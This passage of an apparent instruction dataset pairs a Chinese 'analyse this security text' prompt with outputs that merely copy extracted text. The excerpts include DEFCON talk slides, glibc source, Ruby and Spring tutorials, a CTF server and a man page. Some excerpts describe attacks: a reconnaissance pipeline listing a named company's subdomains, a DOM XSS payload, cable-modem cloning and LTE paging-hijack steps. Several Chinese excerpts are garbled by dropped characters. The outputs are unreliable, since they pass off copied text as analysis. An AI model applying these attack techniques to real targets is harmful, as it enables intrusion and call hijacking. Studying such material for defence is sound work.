hiring manager  Hacker with little to no work experience in the field  Hacker with experience looking for their next opportunity Why are we talking about this at DEFCON?  Lots of talks about how to be a better pen tester and how to use all of the cool new tools, but only a few talks that address what some of us consider to be the hardest part of getting a job in InfoSec: the hiring process.  We desperately need people with the technical skills hackers have  Both sides of the table are doing horribly when it comes to hiring and interviewing for work. Why are we talking about this at DEFCON? This talk takes our experiences (and that of others in the community) as both interviewers ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 释放内存块关于__libc_free 类似于 mallocfree 函数也有一层封装命名格式与 malloc 基本类似代码如下 ```c++ void __libc_free(void *mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ // 判断是否有钩子函数 __free_hook void (*hook)(void *, const void *) = atomic_forced_read(__free_hook); if (__builtin_expect(hook != NULL, 0)) { (*hook)(mem, RETURN_ADDRESS(0)); return; } // free NULL没有作用 if (mem == 0) /* free(0) has no effect */ return; // 将mem转换为chunk状态 p = mem2chunk(mem); // 如果该块内存是mmap得到的 if (chunk_is_mmapped(p)) /* release mmapped memory. */ { /* See if the dynamic brk/mmap threshold needs adjusting. Dumped fake mmapped chunks do not affect the threshold. */ if (!mp_.no_dyn_threshold && chunksize_nomask(p) > mp_.mmap_threshold && chunksize_nomask(p) <= DEFAULT_MMAP_THRESHOLD_MAX && !DUMPED_MAIN_ARENA_CHUNK(p)) { mp_.mmap_threshold = chunksize(p); mp_.trim_threshold = 2 * mp_.mmap_threshold; LIBC_PROBE(memory_mallopt_free_dyn_thresholds, 2, mp_.mmap_threshold, mp_.trim_threshold); } munmap_chunk(p); return; } // 根据chunk获得分配区的指针 ar_ptr = arena_for_chunk(p); // 执行释放 _int_free(ar_ptr, p, 0); } ``` ### 释放内存块关于_int_free 函数初始时刻定义了一系列的变量并且得到了用户想要释放的 chunk 的大小 ```c++ static void _int_free(mstate av, mchunkptr p, int have_lock) { INTERNAL_SIZE_T size; /* its size */ mfastbinptr * fb; /* associated fastbin */ mchunkptr nextchunk; /* next contiguous chunk */ INTERNAL_SIZE_T nextsize; /* its size */ int nextinuse; /* true if nextchunk is used */ INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */ mchunkptr bck; /* misc temp for linking */ mchunkptr fwd; /* misc temp for linking */ const char *errstr = NULL; int locked = 0; size = chunksize(p); ``` ### 释放内存块简单的检查 ```c++ /* Little security check which won't hurt performance: the allocator never wrapps around at the end of the address space. Therefore we can exclude some size values which might appear here by accident or by \"design\" from some intruder. */ // 指针不能指向非法的地址, 必须小于等于-size为什么 // 指针必须得对齐2*SIZE_SZ 这个对齐得仔细想想 if (__builtin_expect((uintp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBy Lawrence Baldwin & Jaeson Schultz Extreme IP Backtracing I've been attacked now what? The reality is that few attacks are launched directly from an attacker's system since they know they would be easily caught using standard backtracing methods. The Internet is chock full of insecure systems which are easily (read already) compromised, providing a means for attackers to perform untraceable, indirect attacks.  Reduce the total number of compromised hosts  Minimize the amount of time that any system remains in a compromised state The only profound way to improve overall Internet security is to: In order to protect ourselves, we need to ensure that others are protected. Every time your firewall or intrusion detection system logs an event, don't assume the source is the actual attacker. Think of it as a cry for help from a likely victim whose system has been compromised and is just being controlled by an attacker. When we discover that someone is obviously exposed, we should let them know and guide them to the information they need to get protected. CNN.com article Avoiding future denial-of-service attacks about the Feb 2000 DDOS attacks on Yahoo, eBay, Amazon.com and E*Trade Authorities pursuing the attackers say the servers they used belonged to users that had no idea their resources were being used to launch attacks. Why notify victims? Recently, myNetWatchman detected an incident in which a host was infected with the Microsoft SQL Spida Worm. A backtrace of the offending IP yielded some interesting results % This is the RIPE Whois server. % The objects are in RPSL format. % Please visit http://www.ripe.net/rpsl for more information. % Rights restricted by copyright. % See http://www.ripe.net/ripencc/pub- services/db/copyright.html inetnum: 194.190.139.0 - 194.190.139.255 netname: GAN descr: Central Region of GAN RF country: RU admin-c: AV753-RIPE tech-c: AV753-RIPE status: ASSIGNED PA notify: sam@gan.ru notify: ip-reg@ripn.net mnt-by: ROSNIIROS-MNT changed: ip-db", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n信息收集 自定义 pipeline 命令需要 httpxsubfinder 输出 out 文件 python3 icp.py 中国商用飞机有限责任公司 | ./Alive/bin/subfinder -silent | ./Alive/bin/httpx -status-code -title -follow-redire cts -silent -no-color -content-length > out https://cis.comac.cc [200] [796] [] https://fangke.sadri.cn [404] [1497] [404-对不起您访问的页面不存在] https://im.comac.cc [200] [1739] [Coremail 论客] https://pop3.comac.cc [200] [92] [] https://mail.comac.cc [200] [27330] [商飞外网邮件系统] https://mx01.comac.cc [200] [92] [] https://imap.comac.cc [200] [92] [] https://access.comac.cc [200] [7424] [] https://smtp.comac.cc [200] [92] [] https://autodiscover.comac.cc [200] [92] [] https://coremail.comac.cc [302,200] [27330] [商飞外网邮件系统] [https://mail.comac.cc] https://zhaopin.comac.cc [404] [548] [404 Not Found] http://sadri.comac.cc [200] [23655] [上海飞机设计研究院] http://bj.comac.cc [200] [24236] [北京民用飞机技术研究中心] http://saic.comac.cc [200] [24885] [上海航空工业集团有限公司] http://samc.comac.cc [200] [26317] [上海飞机制造有限公司] http://sc.comac.cc [200] [25087] [上海飞机客户服务有限公司] http://www.comac.cc [200] [42812] [中国商飞公司门户网站] http://english.comac.cc [200] [11832] [Commercial Aircraft Corporation of China, Ltd.] http://ipaper.comac.cc [200] [6043] [大飞机报移动版] http://news.comac.cc [200] [39401] [新闻中心] http://paper.comac.cc [200] [484] [] http://m.comac.cc [200] [63943] [中国商飞公司门户网站] 自编写 icp.py https://github.com/n00B-ToT/self_using_example/blob/main/icp.py icp.py usage: python3 icp.py 中国商用飞机有限责任公司 or python3 icp.py comac.cc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 http://www.soldierx.com/defcon18/hacking_docsis_for_fun_and_profit-blake_bitemytaco.ppt Humor 2 Maybe Ted Stevens has a series of hacked modems and a drop amp at his place. Could this be the reason he thinks that the internet is a series of tubes? Background  Personal  I currently do research for S2ERC (Security and Software Engineering Research Center), an NSF Industry/University Cooperative Research Center.  Bitemytaco is one of the root admins at SBHacker (http://www.sbhacker.net)  Speech  We covered DOCSIS 2.0 and below at Defcon 16 with devDelay.  Our last speech led to a plethora of people to come to SBHacker and discuss modem technology (including employees at the various ISPs) 3 What This Speech Will Cover  Requirements (for our examples)  Previous Speech Overview  Anonymous access  Cloning HFC MAC linked to an ISP account  How anonymous you really are  Previous Firmware  DOCSIS 3.0  Changes from the ISPs and Hackers  Packetcable  How VOIP got owned  United States vs Modem Hackers  Criminal Cases  Who all got a visit from the party van after our last speech?  New Tools and Firmware  A review of all of the fancy new tools and firmware  The Future  Botnet problems, the law, and future security solutions 4 Requirements  What do you need for our examples?  Coaxial connection to the cable company  SPI/JTAG cable  SPI/JTAG (Serial Peripheral Interface/Joint Test Action Group)  USB Cypress or FTDI based SPI/JTAG(Fast)  SPI/Parallel JTAG buffered (Slow)  SB6120/SBV6220/DPC3000 cable modem  Other modems can be modified  Soldering Skills  YouTube is an excellent resource for soldering reference  Solder wires directly to SPI flash chip  Applications for flashing the firmware onto a modem  USBJTAG NT  Haxomatic  SPI Programmer 5  Hardware (blame the manufacturers)  Absolutely no physical security  Common hardware components  Software (blame the developers)  Initial hacks involved netboot/etherboot, enabling built in factory mode (implemented by the OS and enabled by s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前 在参与BugBounty时排榜中有些分数很除了他很勤奋外还有很好的动化来发现资产中的漏洞像h1这 种赏平台竞争也很明显的漏洞乎很少要不资产独特要不漏洞点很隐蔽否则不容易发现,我在开始接触 这个平台因为xss最好上所以我花了很多时间在这上但是反射型xss很容易重复因为其他也很容易发现 或者扫到所以最开始那段时间我把光集中在Dom Xss上并且制作了动化来帮助我发现这种类型的漏洞尽管 国内并不重视Xss但是国外对于Xss的奖励还算可观所以对于学习这个漏洞类型来说很有助因为有钱赚 (-) 且还有些师傅不嫌弃的帮助我常感谢所以我想分享些在参与BugBounty遇到的Dom Xss希望对于初 学者有帮助 本不包含任何关于如何扫描Dom Xss的内容 很多案例已修复所以只能从漏洞报告中找漏洞代码或者通过Wayback Machine来寻找之前的源代码,经过点点删 改 有些案例Dom很复杂也不典型章只分享些经典案例在挖洞时可能可以参考 尽管国外对Xss的奖励可观但Xss依然属于中危级别漏洞SSRF,RCE,Sql注这些赏通常还是很低所以想要在 BugBounty中获得更多收还是需要关注研究些危害类型漏洞未来可能会分享关于其他类型的 成果 为什么把成果放在最前因为我说了赚钱是助或者说动我是俗就是为了赚钱 我收到关于Dom Xss的赏总计在 30000$ 左右最的 100$ ,最的 3000$ 概70份报告90%的结果来动化 时间概是2年因为前期在优化改bug我没有24时天天扫描我是偶尔导些标来扫描因为太懒了+三意 +还有其他事情断断续续的隔段时间搞会动化是帮我找到可能的脆弱点然后动分析很快就可以得到结果 案例 关于Dom xss我很早之前还有篇章那也可以让你了解更多基础 以下所有案例来真实站 通常学习Dom Xss,找到的章似乎是很明显的Dom xss我也发现过但是遇到的率很 例如 var url = window.location.href; var newUrl = 'DjamLanding.aspx'; var splitString = url.split('?url='); if (splitString.length > 1) { newUrl = splitString[1]; window.top.location.href = newUrl; } else { // New Url With NO query string alert('NO query string'); } window.top.location.href = newUrl; 这种很简单,直接分割 ?url= , 然后来跳转 Payload https://test.com/xss?url=javascript:alert(1) 最常的Case 1 概括从URL中获取指定参数值然后写页 这种类型重点是获取参数的式 1 var getUrlParameter = function getUrlParameter(sParam) { var sPageURL = window.location.search.substring(1), sURLVariables = sPageURL.split('&'), sParameterName, i; for (i = 0; i < sURLVariables.length; i++) { sParameterName = sURLVariables[i].split('='); if (sParameterName[0] === sParam) { return sParameterName[1] === undefined ? true : decodeURIComponent(sPara meterName[1]); } } }; 2 function getQueryParamByName(e) { var t = window.location.href; e = e.replace(/[\\[\\]]/g, \"\\\\$&\"); var a = new RegExp(\"[?&]\" + e + \"(=([&#]*)|&|#|$)\").exec(t); return a ? a[2] ? decodeURIComponent(a[2].replace(/\\+/g, \" \")) : \"\" : null } 3 new URLSearchParams(window.location.search).get('ParamName') 这3种式的共同点是全部都会解码前两个调了 decodeURIComponent ,第3个 URLSearchParams 是对URL参数操 作的原法也会解码 由于获取参数会解码,所以如果", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeaconPayloadShellcode我傻傻分不清 1. 前言 有一段时间我发现好多安全从业者也包括我分不清楚C2工具中的一些名词包括Beacon PayloadShellcodeLoaderStagerStagerless等没办法都是舶来品洋大人的文章中有时候也 是乱用的更不要说国内的相关文章导致大家对以上词汇的理解出现了分歧然后就出现了相互交流 的时候鸡同鸭讲的情况以下是我对这些词汇的理解有分歧欢迎讨论 2. Beacon和Payload 前段时间看见这么一段话 没有任何贬低和攻击的意思我私信作者讨论了下关于什么是Beacon Beacon字面意思是信标主要功能有心跳和执行方法你可以把它理解成一个灯塔在不停的 闪烁发出我在这儿我在这儿的信号 心跳按照设定的时间周期和抖动不断的发送基本信息回控制端 执行方法接受具体功能代码后执行这些代码的方法 Payload字面意思是有效载荷卫星或航天器携带的仪器设备等Payload被用在了很多地方 也是最让人傻傻分不清的名词所有被承载的物品都能叫做Payload因此 用Loader执行ShellcodeShellcode可以被叫做Payload 用DLL反射方法执行一个反射DLL文件反射DLL文件可以叫做Payload 在CS中你使用键盘记录功能传给Beacon一个键盘记录的反射DLL这个反射DLL可以叫做 Payload 所以说Beacon是一个Payload也没有多大问题 3. Shellcode和Loader 这俩经常组合在一起在CS中有一个Payload Generator的选项主要生成的就是Shellcode这些 Shellcode没法作为可执行程序执行需要Loader来执行它们 Shellcode维基上被定义为一段用于利用软件漏洞而执行的代码这段代码通常的功能是获得一个 shell因此得名Shellcode但是现在意义被扩大了很多主要是以下2个特点 与位置无关的代码PIC 无法独立执行 Loader就是字面意思加载器通常被用来对抗杀软从静态特征到动态沙盒Loader的实现也是 千奇百怪从不同语言到不同执行方法根据加载的内容的不同有PE LoaderShellcode Loader反射DLL Loader等等 4. StageStageless 分阶段和不分阶段在实际红队工作中很多时候不能在目标上执行过大的代码和文件因此出现了 用一个小一点的代码去拉取更大的功能代码的情况我们把这个一段一段的拉去代码执行的过程叫分阶 段执行因此出现了Stage(分阶段)和Stageless(不分阶段)这两个词这其实很好理解但伴随出现的 StagerStagerless让人有点傻傻分不清了 Stager主要指用于执行下一阶段代码的相关代码有点拗口 Stagerless这个词语应该是国人创造的我想说用Stageless就好 5. 以CobalStrike为例 CS的分阶段加载过程 总的来说能用中文说清楚的别抖英文", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 方法 --- - https://www.kancloud.cn/imxieke/ruby-base/107294 --- # 方法的调用 **简单的方法调用** 调用方法的语法如下所示 ```ruby 对象. 方法名( 参数 1, 参数 2,  , 参数 n ) ``` 以对象开头中间隔着句点后面接着是方法名方法名后面是一排并列的用 `()` 括起来的参数不同的方法定义的参数个数和顺序也都不一样调用方法时必须按照定义来指定参数另外调用方法时 `()` 是可以省略的 上面的对象被称为接收者receiver在面向对象的世界中调用方法被称为向对象发送消息message调用的结果就是对象接收receive了消息也就是说方法的调用就是把几个参数连同消息一起发送给对象的过程 **带块的方法调用** `each` `方法loop` 方法方法本身可以与伴随的块一起被调用这种与块一起被调用的方法我们称之为带块的方法 带块的方法的语法如下 ```ruby 对象. 方法名( 参数, ) do | 变量 1, 变量 2, | 块内容 end ``` `do  end` 这部分就是所谓的块除 do  end 这一形式外我们也可以用 `{}` 将块改写为其他形式 ```ruby 对象. 方法名( 参数, ) { | 变量 1, 变量 2, | 块内容 } ``` > 使用 do  end 时可以省略把参数列表括起来的 `()`使用 `{  }` 时只有在没有参数的时候才可以省略 `()`有一个以上的参数时就不能省略 在块开头的 `` 部分中指定的变量称为块变量在执行块的时候块变量由方法传到块内部不同的方法对应的块变量的个数值也都不一样之前介绍过的 times 方法有一个块变量执行块时方法会从 0 开始依次把循环次数赋值给块变量 ```ruby 5.times do |i| puts \"第#{i} 次循环\" end ``` **运算符形式的方法调用** Ruby 中有些方法看起来很像运算符四则运算等的二元运算符`-`负号等的一元运算符指定数组散列的元素下标的 `[]` 等实际上都是方法 - obj + arg1 - obj =~ arg1 - -obj - !obj - obj[arg1] - obj[arg1] = arg2 这些虽然与一般的方法调用的语法有点不一样但我们可以将 `obj` 理解为接收者将 `arg1``arg2` 理解为参数这样一来它们就又是我们所熟知的方法了我们可以自由定义这种运算符形式的方法 # 方法的分类 根据接收者种类的不同Ruby 的方法可分为 3 类 1. 实例方法 2. 类方法 3. 函数式方法 **实例方法** 实例方法是最常用的方法假设有一个对象实例那么以这个对象为接收者的方法就被称为实例方法 下面是实例方法的一些例子 ```ruby p \"10, 20, 30, 40\".split(\",\") #=> [\"10\", \"20\", \"30\", \"40\"] p [1, 2, 3, 4].index(2) #=> 1 p 1000.to_s #=> \"1000\" ``` 在本例中从上到下分别以字符串数组数值对象为接收者 对象能使用的实例方法是由对象所属的类决定的调用对象的实例方法后程序就会执行对象所属类预先定义好的处理 虽然相同名称的方法执行的处理大多都是一样的但具体执行的内容则会根据对象类型的不同而存在差异例如几乎所有的对象都有 to_s 方法这是一个把对象内容以字符串形式输出的方法然而虽然都是字符串形式但在数值对象与时间对象的情况下字符串形式以及字符串的创建方法却都不一样 ```ruby p 10.to_s #=> \"10\" p Time.now.to_s #=> \"2013-03-18 03:17:02 +900\" ``` **类方法** 接收者不是对象而是类本身时的方法我们称之为类方法例如我们在创建对象的时候就使用到了类方法 ```ruby Array.new # 创建新的数组 File.open(\"some_file\") # 创建新的文件对象 Time.now # 创建新的 Time 对象 ``` 此外不直接对实例进行操作只是对该实例所属的类进行相关操作时我们也会用到类方法例如修改文件名的时候我们就会使用文件类的类方法 ```ruby File.rename(oldname, newname) # 修改文件名 ``` 类方法也有运算符的形式 ```ruby File::rename(oldname, newname) # 修改文件名 ``` 调用类方法时可以使用 `::` 代替 `.`在 Ruby 语法中两者所代表的意思是一样的 **函数式方法** 没有接收者的方法我们称之为函数式方法 虽说是没有接收者但并不表", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python import time; import random; FLAG = ''; def cycleLen(data, place): seen = {}; count = 0; while not place in seen: seen[place] = 1; count += 1; place = data[place]; return count; def realSign(data): res = 1; for i in range(256): res *= cycleLen(map(ord, data), i); return res; import base64, SocketServer, os, sys, hashlib; class ServerHandler(SocketServer.BaseRequestHandler): def fail(self, message): self.request.sendall(message + \"\\n\"); self.request.close(); def pow(self): proof = base64.b64encode(os.urandom(9)); self.request.sendall(proof); test = self.request.recv(20); ha = hashlib.sha1(); ha.update(test); if test[0:12] != proof or not ha.digest().endswith('\\x00\\x00\\x00'): self.fail(\"Bad proof of work.\"); def sign(self, invalid): data = base64.b64decode(self.request.recv(172)); if len(data) != 128: self.fail(\"Bad data\"); return; if data == invalid: self.fail(\"Same data\"); return; self.request.sendall(str(realSign(self.SECRET + data)) + \"\\n\"); def check(self, compare): sig = int(self.request.recv(620)); return sig == realSign(self.SECRET + compare); def handle(self): #self.pow(); self.SECRET = os.urandom(128); self.TO_SIGN = os.urandom(128); self.request.sendall(\"You need to sign:\\n\"); self.request.sendall(base64.b64encode(self.TO_SIGN)); for i in range(256): self.request.sendall(\"\\n1) Sign something\\n2) Give me signiture of data\\n\"); op = int(self.request.recv(2)); if op == 1: self.sign(self.TO_SIGN); elif op == 2: if self.check(self.TO_SIGN): self.request.sendall(FLAG); break; else: self.fail(\"Bad option\"); break; self.request.close(); class ThreadedServer(SocketServer.ForkingMixIn, SocketServer.TCPServer): pass; if __name__ == \"__main__\": HOST = sys.argv[1]; PORT = int(sys.argv[2]); FLAG = open('flag.txt', 'r').read(); server = ThreadedServer((HOST, PORT), ServerHandler); server.allow_reuse_address = True; server.serve_forever();", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGhost Telephonist Impersonates You Through LTE CSFB Yuwei ZHENG, Lin HUANG Qing YANG, Haoqi SHAN, Jun LI UnicornTeam, 360 Technology July 30, 017 Who We Are  360 Technology is a leading Internet security company in China. Our core products are anti-virus security software on PC and cellphones.  UnicornTeam (https://unicorn.360.com/) was built in 2014. This is a group that focuses on the security issues in many kinds of telecommunication systems.  Highlighted works of UnicornTeam include:  Low-cost GPS spoofing research (DEFCON 23)  LTE redirection attack (DEFCON 24)  Attack on power line communication (BlackHat USA 2016) Voice Solutions in LTE Network  VoLTE  Voice over LTE, based on IP Multimedia Subsystem (IMS)  Final target of network evolution  CSFB  Circuit Switched Fallback: switch from 4G to 3G or 2G when taking voice call  SV-LTE  Simultaneous Voice and LTE  Higher price and rapid power consumption on terminal Normal 2G Call vs. CSFB When we analyze the signaling flow of CSFB, we were surprised to find that there is no authentication step. But in normal 2G call, AKA does exist for every call. Vulnerability in CSFB Vulnerability in CSFB  The principle is like someone comes out from the door of LTE, then enters the door of GSM. He shouts I must be as quick as possible! Then he is permitted to enter, without the badge of GSM. How can we exploit it?  Basic idea  Because CSFB hasnt authentication procedure, attackers can send Paging Response on 2G network, impersonating the victim, then hijack the call link. Experiment Environment C118 OsmocomBB L1 OsmocomBB L2/3 Exploitation I  Random Hijack The first idea we got, is to randomly attack the cellphones in CSFB status. Attack Steps  1) Listen on PCH channel  2) Extract TMSI/IMSI in paging  3) Forging a paging response with the TMSI/IMSI  4) Check whether MSC accepts the paging response Attack Signaling Flow The Ghost Telephonist gets control from here. Why Network Sends Paging on 2G  Cellphone stays in 4G  Network ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nrmmod === 从运行的内核中移除指定的内核模块 ## 补充说明 **rmmod命令** 用于从当前运行的内核中移除指定的内核模块执行rmmod指令可删除不需要的模块Linux操作系统的核心具有模块化的特性应此在编译核心时务须把全部的功能都放如核心你可以将这些功能编译成一个个单独的模块待有需要时再分别载入它们 ### 语法 ```shell rmmod(选项)(参数) ``` ### 选项 ```shell -v显示指令执行的详细信息 -f强制移除模块使用此选项比较危险 -w等待着直到模块能够被除时在移除模块 -s向系统日志syslog发送错误信息 ``` ### 参数 模块名要移除的模块名称 ### 实例 用rmmod命令主要用于卸载正在使用的Linux内核模块与`modprobe -r`命令相似如下所示 ```shell [root@localhost boot]# lsmod | grep raid1 raid1 25153 0 [root@localhost boot]# rmmod raid1 [root@localhost boot]# lsmod | grep raid1 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSpring 四天学习总结 Spring概述 Spring 是分层的 Java SE/EE 应 full-stack 轻量级开源框架以 IoCInverse Of Control 反转控制和 AOPAspect Oriented Programming向切编程为内核提供了展现层 Spring MVC 和持久层 Spring JDBC 以及业务层事务管理等众多的企业级应技术还能整合 开源世界众多 著名的第三框架和类库逐渐成为使最多的 Java EE 企业应开源框架 主要特点如下 ①轻量级IoC容器IoC容器是于管理所有bean的声明周期是Spring的核组件在此基础 之上开发者可以选择要集成的组件如消息传递事务管理数据持久化及Web组件 等 ②采AOP编程式Spring推崇使AOP编程式AOP( Aspect Orier由dProgramming, 向切编程的标与OOP( Object Oriented Programming向对象编程的标并没有 不同都是为了减少重复和专注于业务 ③量使注解Spring提供了量的注解持声明式的注式极地简化了配置 ④避免重复造轮Spring集成了量市上成熟的开源组件站在巨的肩膀上这样既 增强了Spring的功能避免了重复造轮 IOC的概念及作 1.耦合 耦合程序间的依赖关系包括类之间的依赖以及法间的依赖 解耦降低程序间的依赖关系 实际开发中编译期不依赖运时才依赖 解耦的思路 1.使反射创建对象避免使new关键字 2.通过读取配置件来获取要创建的对象全限定类名 如图实现了初步的解耦 2.BeanFacktor 模式解耦 创建了个集中管理Bean的地且当中存在Map类型的 beans来盛放所有的bean(这个 Map为bean的容器)且通过读取配置件中配置的内容在项启动时创建对象解决了bean 创建多次问题 /** 1 * 一个创建Bean对象的工厂 2 * 3 * Bean在计算机英语中有可重用组件的含义 4 * JavaBean用java语言编写的可重用组件 5 * javabean > 实体类 6 * 7 * 它就是创建我们的service和dao对象的 8 * 9 * 第一个需要一个配置文件来配置我们的service和dao 10 * 配置的内容唯一标识=全限定类名key=value) 11 * 第二个通过读取配置文件中配置的内容反射创建对象 12 * 13 * 我的配置文件可以是xml也可以是properties 14 */ 15 public class BeanFactory { 16 //定义一个Properties对象 17 private static Properties props; 18 19 //定义一个Map,用于存放我们要创建的对象我们把它称之为容器 20 private static Map<String,Object> beans; 21 22 //使用静态代码块为Properties对象赋值 23 static { 24 try { 25 //实例化对象 26 props = new Properties(); 27 //获取properties文件的流对象 28 InputStream in = BeanFactory.class.getClassLoader().getResourceAsStream(\"bean.properties\"); 29 props.load(in); 30 //实例化容器 31 beans = new HashMap<String,Object>(); 32 //取出配置文件中所有的Key 33 Enumeration keys = props.keys(); 34 //遍历枚举 35 while (keys.hasMoreElements()){ 36 //取出每个Key 37 String key = keys.nextElement().toString(); 38 //根据key获取value 39 String beanPath = props.getProperty(key); 40 //反射创建对象 41 Object value = Class.forName(beanPath).newInstance(); 42 //把key和value存入容器中 43 beans.put(key,value); 44 } 45 }catch(Exception e){ 46 throw new ExceptionInInitializerError(\"初始化properties失 败\"); 47 } 48 } 49 50 /** 51 * 根据bean的名称获取对象 52 * @param beanName 53 * @retu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n中通自动化安全运营 演讲人中通快递 马 辰 Title 中通安全运营负责人 中通安全运营介绍 中通自动化安全运营 - DevSecOps 中通安全赋能 中通安全运营的未来 目录 中通安全运营介绍 中通安全运营介绍 安全合规 中通安全 安全运营 安全测试 安全开发 安全运维 主动防御型完成体系 建设后开始搭建安全自 动化平台安全可视化 后可以快速准确地感 知安全威胁并进行自动 响应和处理对安全威 胁主动出击 安全自动化平台建设 需求驱动型经历过 不断的救火后从基 础安全开始重点解决 安全需求中优先级最 高的安全问题 基础安全建设 主动建设型完成基 础安全建设后开始建 设完整的安全体系 主要是为了最大化地 发现当前潜在的安全 威胁以及避免未来可 能发生的安全风险 安全体系化建设 中通安全运营介绍 事件驱动型由一个 安全漏洞或者事件驱 动开始建设安全主 要目的是处理当前的 安全事件 救火阶段 中通安全运营介绍 安全运营 将安全写入企业的基因 中通自动化安全运营 DevSecOps SDLSecurity Development Lifecycle DevSecOps 怎么用有限的安全资源完成整个系统生命周期的覆盖 中通自动化安全运营 DevSecOps 天 眼 系 统 中 通 学 院 安 全 需 求 评 审 安 全 架 构 评 审 CMDB 星云系统 同安漏洞管理系统 Jump server 被 动 扫 描 安 全 测 试 主 机 安 全 管 理 系 统 中 通 安 全 应 急 响 应 中 心 安 全 线 上 巡 航 项目管理系统 安 全 编 码 规 范 扫 描 钓 鱼 测 试 系 统 中通质控中心 代 码 扫 描 中通自动化安全运营 DevSecOps 中通安全管理运营平台 中通自动化安全运营 DevSecOps 中通天眼系统 30秒快速验证 中通安全培训体系 钓鱼测试系统 中通自动化安全运营 DevSecOps 产品需求评审 产品管理委员会 产品经理 信息安全师 项目经理 信息安全师 系统架构师 安全架构师 产品立项 系统架构评审 中通自动化安全运营 DevSecOps 中通安全编码规范 开发安全工程师 星云系统 中通自动化安全运营 DevSecOps 静态代码扫描引擎 中通安全编码规范 Gitlab IDE插件 研发提交代码 安全测试阶段 功能测试阶段 GIT库代码扫描保 障代码库内的代码 安全 被动扫描完成功能 测试时即可查看安全 扫描结果 标准化的半自动安全 增量测试主要测试 越权等安全扫描较难 覆盖的安全风险 中通自动化安全运营 DevSecOps 测试环境 生产环境 中通自动化安全运营 DevSecOps 安全测试准出流程 星云DevOps 中通自动化安全运营 DevSecOps 安全访问流程 欢迎关注中通安全 中通安全应急响应中心 中通自动化安全运营 DevSecOps 中通安全赋能 中通安全赋能 中通安全 安全能力 安全服务 安全影响力 中通安全赋能 市场部 招标要求项全部符合要中标 监察中心 可以快速定位嫌疑人 测试工程师 安全测试工资高我想学安全测试 研发工程师 系统按时上线不要出BUG 中通安全赋能 研发部门 统一登录系统 权限管理系统 安全存储服务 安全日志中心 安全风控系统 运维部门 网络安全架构 主机安全基线 主机安全监控 上网准入系统 办公安全管理 质量部门 被动扫描系统 安全测试 漏洞管理系统 安全风险管理 安全风险分析 产品部门 实人认证 安全合规 安全审计 需求安全评审 安全加固 中通安全赋能 人力资源中心 资产管理中心 营运中心 监察中心 市场部 法务部 公共事务中心 服务质量中心 中通快递 中 通 快 运 大 誉 国 际 中 通 商 业 中 通 金 融 中 通 云 仓 星 联 航 空 中 通 智 能 中 快 传 媒 中通安全 中通安全赋能 中通安全赋能 安全服务 安全能力 安全影响力 中通安全运营的未来 安全可视化 安全自动化 安全生态化 安全数字化 中通安全运营的未来 中通安全运营的未来 中通安全开放平台 被动扫描系统 同安漏洞管理平台 安全应急响应中心 威胁情报共享平台 中通安全运营的未来 THANKS 欢迎关注中通安全 欢迎与我多多交流", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1993 Michael Haardt (michael@moria.de), Fri Apr 2 11:32:09 MET DST 1993 .\\\" .\\\" This is free documentation; you can redistribute it and/or .\\\" modify it under the terms of the GNU General Public License as .\\\" published by the Free Software Foundation; either version 2 of .\\\" the License, or (at your option) any later version. .\\\" .\\\" The GNU General Public License's references to \"object code\" .\\\" and \"executables\" are to be interpreted as the output of any .\\\" document formatting or typesetting system, including .\\\" intermediate and printed output. .\\\" .\\\" This manual is distributed in the hope that it will be useful, .\\\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\\\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\\\" GNU General Public License for more details. .\\\" .\\\" You should have received a copy of the GNU General Public .\\\" License along with this manual; if not, write to the Free .\\\" Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111, .\\\" USA. .\\\" .\\\" Modified Sat Jul 24 16:56:20 1993 by Rik Faith <faith@cs.unc.edu> .\\\" Modified Mon Oct 21 21:38:51 1996 by Eric S. Raymond <esr@thyrsus.com> .\\\" (and some more by aeb) .\\\" .TH HD 4 1992-12-17 \"Linux\" \"Linux Programmer's Manual\" .SH NAME hd \\- MFM/IDE 硬盘设备 .SH \"描述 DESCRIPTION\" \\fBhd*\\fP 开头的设备是以裸模式(raw mode)访问MFM/IDE类型硬盘的块 设备. 第一个IDE驱动控制器上的主盘(主设备号3)是 \\fBhda\\fR ;从盘是 \\fBhdb\\fR. 第二个IDE驱动器控制器(主设备号22)是 \\fBhdc\\fR ,从为 \\fBhdd\\fR. .LP 大多数IDE 块设备以 .BI hd X\\c , 或者 .BI hd XP\\c 的形式命名, 其中字母 .I X 代表任意字母以表示各个物理设备.其中P表示各个物理设备中分区的代号. .I P 表示各个物理设备中分区的代号第一种形式 .BI hd X, 代表整个驱动器的地址,而分区号是按照每个分区 被发现的顺序分配的,并且只有非空和非扩展分区才能有这个号码 然而不管这个分区是未使用过的还是扩展的,在MBR中只纪录四个分区 号码依次为1-4. 因此逻辑分区只能从 .BI hd X 